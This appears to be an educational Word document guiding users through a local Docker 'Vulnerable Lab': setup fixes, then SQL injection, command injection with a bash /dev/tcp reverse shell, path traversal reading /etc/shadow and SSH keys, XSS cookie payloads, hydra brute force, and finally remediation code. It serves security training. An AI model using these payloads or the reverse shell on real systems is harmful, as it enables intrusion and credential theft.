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Vulnerable Lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1F4E79" w:val="clear"/>
        <w:spacing w:before="0" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:color w:val="AED6F1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Testing &amp; Exploitation Guide</w:t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Docker Lab  |  Flask Web App  |  Python3 Exploit Scripts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For Educational Use Only — Run Locally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Lab Overview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document covers the full setup, exploitation, known errors, and fixes for the Vulnerable Lab Docker environment. The lab is designed for self-study in web application security, network exploitation, and Python3 exploit scripting.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HTTP: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Flask Web App (port 5000 inside container)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SSH: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OpenSSH with weak credentials (port 22 → host 2222)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TCP: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Magic-bytes TCP service (port 9999)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FTP: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vsftpd anonymous FTP (port 21)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Vulnerability Summary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400"/>
        <w:gridCol w:w="14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Reflected XSS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B8860B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SSH Brute-Force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Magic Bytes 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 9999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1E7145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DEMO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Setup &amp; Build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Build the Image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build -t vuln-lab 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Run the Container  (Correct Port Mapping)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Port 5000 is commonly occupied on macOS by AirPlay Receiver. Map to host port 5001 instead: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run -d -p 5001:5000 -p 2222:22 -p 9999:9999 --name labu vuln-lab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Verify Services Are Up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exec labu ps aux | grep -E 'python|sshd|vsftpd'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http://localhost:5001/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 Teardown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stop labu &amp;&amp; docker rm labu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Known Errors &amp; Fixes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Error 1 — COPY flask_app.py: not found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Dockerfile contained a stray COPY instruction for a file that did not exist on the host. The file was already created inline via a heredoc, making the COPY redundant.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Root Cause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 Vulnerable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flask_app.py /apps/flask_vuln/app.py
RUN cat &gt; /apps/flask_vuln/app.py &lt;&lt;'PYEOF'
...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 Fixed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Remove the COPY line entirely.
# The heredoc below already creates the file.
RUN cat &gt; /apps/flask_vuln/app.py &lt;&lt;'PYEOF'
...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Error 2 — Port 5000 Already in Use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macOS Monterey and later reserves port 5000 for AirPlay Receiver, causing docker run to fail with 'address already in use'.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 A — Map to a different host port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run -d -p 5001:5000 -p 2222:22 -p 9999:9999 --name labu vuln-lab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Then update BASE in exploit_lab.py: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BASE = "http://localhost:5001"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 B — Disable AirPlay Receiver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System Settings → General → AirDrop &amp; Handoff → AirPlay Receiver → OFF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Error 3 — SQLMap zsh URL Parsing Error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&amp; character in zsh is a background-job operator. Running sqlmap without quoting the URL splits the command.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 Vulnerable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sqlmap -u http://127.0.0.1:5001/login?username=admin&amp;password=x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 Fixed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sqlmap -u "http://127.0.0.1:5001/login?username=admin&amp;password=x" -p username --dump --batch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Error 4 — Path Traversal: id_rsa Not Found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root SSH key did not exist inside the container because no key had been generated. The path traversal itself was working correctly.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 — Generate a key first, then steal it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exec labu ssh-keygen -t rsa -N "" -f /root/.ssh/id_rsa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"http://localhost:5001/file?name=../../root/.ssh/id_rsa"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Alternative — Read files that always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curl "http://localhost:5001/file?name=../../etc/passwd"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curl "http://localhost:5001/file?name=../../etc/shadow"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curl "http://localhost:5001/file?name=../vuln_app.py"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curl "http://localhost:5001/file?name=../../proc/self/environ"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Manual Exploitation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SQL Injection  (/login)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login endpoint builds queries using Python string formatting instead of parameterised queries, making it trivially injectable.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Auth bypass — comment out the password clause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"http://localhost:5001/login?username=admin'--&amp;password=anything"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Always-true condition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"http://localhost:5001/login?username=' OR '1'='1&amp;password=x"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UNION dump — extract all credentials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"http://localhost:5001/login?username=' UNION SELECT 1,group_concat(username||':'||password),NULL FROM users--&amp;password=x"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Automated with sqlmap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sqlmap -u "http://localhost:5001/login?username=admin&amp;password=x" -p username --dump --batch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Command Injection  (/ping)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host parameter is passed unsanitised to subprocess.getoutput() with shell=True, allowing arbitrary command execution.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"http://localhost:5001/ping?host=127.0.0.1;id"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"http://localhost:5001/ping?host=127.0.0.1;cat+/app/secret_files/secret.txt"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"http://localhost:5001/ping?host=127.0.0.1;ls+/app"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Reverse shell (run listener first: nc -lvp 4444)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"http://localhost:5001/ping?host=127.0.0.1;bash+-i+&gt;%26+/dev/tcp/host.docker.internal/4444+0&gt;%261"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Path Traversal  (/file)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file endpoint joins user input with os.path.join() but does not validate whether the resulting path escapes the base directory.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"http://localhost:5001/file?name=secret.txt"          # intended file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"http://localhost:5001/file?name=../../etc/passwd"     # escape base dir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"http://localhost:5001/file?name=../../etc/shadow"     # hashed passwords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"http://localhost:5001/file?name=../vuln_app.py"       # app source code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"http://localhost:5001/file?name=../../proc/self/environ" # env vars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 Reflected XSS  (/search)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search parameter is echoed directly into the HTML response without escaping, allowing script injection.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Paste these into a browser address bar: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http://localhost:5001/search?q=&lt;script&gt;alert('XSS')&lt;/script&gt;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http://localhost:5001/search?q=&lt;img src=x onerror=alert('XSS')&gt;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http://localhost:5001/search?q=&lt;script&gt;alert(document.cookie)&lt;/script&gt;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 SSH Brute-Force  (port 2222)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ssh -p 2222 root@localhost          # password: toor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ssh -p 2222 labuser@localhost       # password: password123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With hydra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hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://localhost:2222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With Python + paramiko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python3 exploit_lab.py              # select option 6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 Magic Bytes TCP  (port 9999)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Send the exact byte sequence 0x41414141DEADBEEF to receive the flag.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python3 -c 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socket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 = socket.socket()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s.connect(('localhost', 9999))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print(s.recv(1024))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s.send(b'\x41\x41\x41\x41\xde\xad\xbe\xef')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print(s.recv(1024))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s.close()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"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Remediation Reference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successfully exploiting each vulnerability, apply the fixes below and verify that your exploit scripts no longer work.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SQL Injection Fix — Parameterised Queries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 Vulnerable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 = f"SELECT * FROM users WHERE
  username='{username}' AND
  password='{password}'"
row = db.execute(query).fetchone()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 Fixed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 = "SELECT * FROM users WHERE
  username=? AND password=?"
row = db.execute(query, (username, password)).fetchone()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Command Injection Fix — Remove shell=True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 Vulnerable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= subprocess.getoutput(
  f'ping -c 1 {host}')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 Fixed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shlex
safe = shlex.quote(host)
result = subprocess.run(
  ['ping', '-c', '1', safe],
  capture_output=True, text=True)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Path Traversal Fix — Resolve and Validate Path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 Vulnerable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path = os.path.join(
  '/app/secret_files', name)
with open(path) as f:
    return f.read()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 Fixed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 = '/app/secret_files'
path = os.path.realpath(
  os.path.join(BASE, name))
if not path.startswith(BASE):
    return 'Forbidden', 403
with open(path) as f:
    return f.read()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 XSS Fix — Escape User Input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 Vulnerable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 f'&lt;h2&gt;Search: {q}&lt;/h2&gt;'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✅  Fixed Code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markupsafe import escape
return f'&lt;h2&gt;Search: {escape(q)}&lt;/h2&gt;'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 SSH Hardening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SSH key authentication; disable password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PasswordAuthentication no in /etc/ssh/sshd_config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PermitRootLogin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fail2ban to block brute-force attempts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Quick Reference Cheatsheet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docker build -t vuln-lab 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the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Image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docker run -d -p 5001:5000 ...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 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 ID printed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curl localhost:5001/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Smoke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 index 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curl '...login?username=admin\'--&amp;password=x'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SQLi bypass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Welcome admin!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curl '...ping?host=127.0.0.1;id'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uid=0(root)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curl '...file?name=../../etc/passwd'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passwd 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ssh -p 2222 root@localhost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SSH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Shell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python3 exploit_lab.py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all exploits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Flags printed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sqlmap -u '...' -p username --dump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SQLi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 dumped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D6E4F0" w:val="clear"/>
        <w:spacing w:before="400" w:after="0"/>
        <w:jc w:val="center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This lab is for educational purposes only. Never run against systems you do not own.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2026-03-30T09:57:22.396Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-30T09:57:22.397Z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